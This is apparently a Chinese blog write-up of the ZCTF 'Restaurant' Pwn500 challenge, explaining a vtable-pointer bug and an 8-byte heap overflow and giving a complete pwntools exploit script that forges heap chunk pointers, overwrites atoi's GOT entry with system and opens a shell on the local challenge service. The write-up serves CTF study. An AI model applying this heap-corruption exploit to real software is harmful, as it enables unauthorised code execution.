版权声明:本文为博主原创文章,未经博主允许不得转载。

 这道压轴的题也是名副其实,很有分量。这也是自己第二次做C++类型的PWN。含有两个漏洞,缺一不可,一个漏洞将指定位置覆盖为对象虚表的地址,另外一个漏洞用来堆溢出(DW-Shoot)。

第一个漏洞所在位置:

第二个漏洞所在位置:如果连续对一种食物编辑评论,第二次则可以8字节的溢出,覆盖下一个堆块的堆头。

由于堆块在分配时的对齐策略,堆块分配后可以使用的内存可能比申请的要大。这道题目中,主食/主菜/汤都有3个种类,只有同时能选中主食的第二种,主菜的第二种才能溢出,而这个选择是随机的,POC所以并不能每次都成功,我这个POC成功的概率为1/9,其实多试几次就能顺利拿到shell。我大概试了3-4次就拿到了shell。上图:

 from pwn import *

 import time

 #by wangaohui

 #context.log_level = 'debug'

 s= remote('127.0.0.1',10001)

 time.sleep(2)

 print 'pid of restaurant is :' + str(pwnlib.util.proc.pidof('restaurant')[0])

 raw_input('go!')

 s.recvuntil('Please enter your name: ')

 s.sendline('/bin/sh;')

 s.recvuntil('you are the luckey ')

 heap = int(s.recvuntil('th guest.\n')[:-10])

 print 'heapaddr is %x' %heap

 s.recvuntil('Are you from China? (y/n) ')

 s.sendline('n')

 s.recvuntil('please enter your country: ');

 vtp = 0x404710

 data = 'a'*10 + '\x00' + 'a'*5 + '\x1c\x47\x40\x00'

 s.sendline(data)

 s.recvuntil('How old are you: ')

 s.sendline('')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order an entree, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('3')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline('xxx')

 s.recvuntil('How does this dish taste: ')

 s.sendline('yyy')

 fakefd = heap + 0x20

 fakebk = heap + 0x28

 appcom = 'a'*40 + p64(0x80) + p64(0x90)

 tastecom = p64(0x81) + p64(fakefd) + p64(fakebk)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('want to cancel(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('the chef has already started to cook.')

 appcom = 'xxx'

 tastecom = p64(0x6060A0)#atoi's got

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Your age: ')

 atoiaddr = int(s.recvuntil('\n')[:-1])

 print 'atoiaddr is:  %x' % atoiaddr

 systemaddr = atoiaddr - 0x36360 + 0x414F0

 print 'systemaddr is:  %x' % systemaddr

 appcom = 'xxx'

 tastecom = 'a'*8 + p64(systemaddr)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('3.Just so so!')

 s.sendline('3.Just so so!')

 s.recvuntil('Thank you for your comment,bye!')

 s.interactive()

ZCTF-Restaurant-Pwn500的更多相关文章

  1. CodeForces - 261B Maxim and Restaurant

    http://codeforces.com/problemset/problem/261/B 题目大意:给定n个数a1-an(n<=50,ai<=50),随机打乱后,记Si=a1+a2+a ...

  2. Flo's Restaurant[HDU1103]

    Flo's Restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) ...

  3. Codeforces Testing Round #12 B. Restaurant 贪心

    B. Restaurant Time Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://codeforces.com/contest/597/problem ...

  4. HDU-2368 Alfredo's Pizza Restaurant

    http://acm.hdu.edu.cn/status.php Alfredo's Pizza Restaurant Time Limit: 1000/1000 MS (Java/Others)   ...

  5. hdoj 4883 TIANKENG’s restaurant【贪心区间覆盖】

    TIANKENG’s restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Java/O ...

  6. hdu2368Alfredo's Pizza Restaurant

    Problem Description Traditionally after the Local Contest, judges and contestants go to their favour ...

  7. HDOJ 4883 TIANKENG’s restaurant

    称号: TIANKENG's restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Ja ...

  8. Restaurant

    Restaurant Time Limit:4000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Submit  ...

  9. 九校联考_24OI——餐馆restaurant

    凉心模拟D1T1--最简单的一道题 TAT 餐馆(restaurant) 题目背景 铜企鹅是企鹅餐馆的老板,他正在计划如何使得自己本年度收益增加. 题目描述 共有n 种食材,一份食材i 需要花ti 小 ...

  10. Codeforces828 A. Restaurant Tables

    A. Restaurant Tables time limit per test 1 second memory limit per test 256 megabytes input standard ...

随机推荐

  1. [转]使用wireshark分析TCP/IP协议中TCP包头的格式

    本文简单介绍了TCP面向连接理论知识,详细讲述了TCP报文各个字段含义,并从Wireshark俘获分组中选取TCP连接建立相关报文段进行分析. 一.概述 TCP是面向连接的可靠传输协议,两个进程互发数 ...

  2. /etc/host 配置主机名字

    每个机子中的hosts文件都应有下面域IP对应的文件

  3. linux笔记2.19

    压缩一般使用 tar -cvzf etcbackup.tar.gz  /etc 寻找文件 locate(快速查找:新添加的得用updatedb更新后才能找到) find:   find . -name ...

  4. seo初学

    对前端而言,做网站采用扁平式结构:控制网页链接数量,不能太少,当然也不能太多:其次采用扁平的目录层次,不能超过3次:三:导航优化,最好是文字,如果是图片的话,alt和title必须添加. 面包屑导航: ...

  5. 1105PHP笔记001

    关于抽象类:abstract class Car{ abstract function getMaximumSpeed();}class FastCar extends Car{ function g ...

  6. Jquery获取背景图片src路径

    例如获取body的背景: Jquery代码如下: var back = $('body').css('backgroundImage'); back.substring(start,end); //截 ...

  7. php设计模式2策略模式

    <?php /** ****************************************************** * 策略模式:策略模式针对一组算法,将每一个算法封装到具有共同接 ...

  8. php如何做数据库攻击

    PHP mysql_real_escape_string() 函数 PHP MySQL 函数 定义和用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的 ...

  9. Bug :”解压压缩文件失败: cpio; 在头中不存在归档“

    问题描述: 在rpm包目录下执行rpm -ivh *rpm -force时,出现标题错误 解决办法: *src.rpm包也就源码包不能被直接进行安装,需要先将src.rpm包进行编译生成二进制的rpm ...

  10. Autofact 的使用

    资料: http://www.cnblogs.com/linhan/p/4298971.html --其他博友 http://autofac.org/# --官网 http://efmvc.codep ...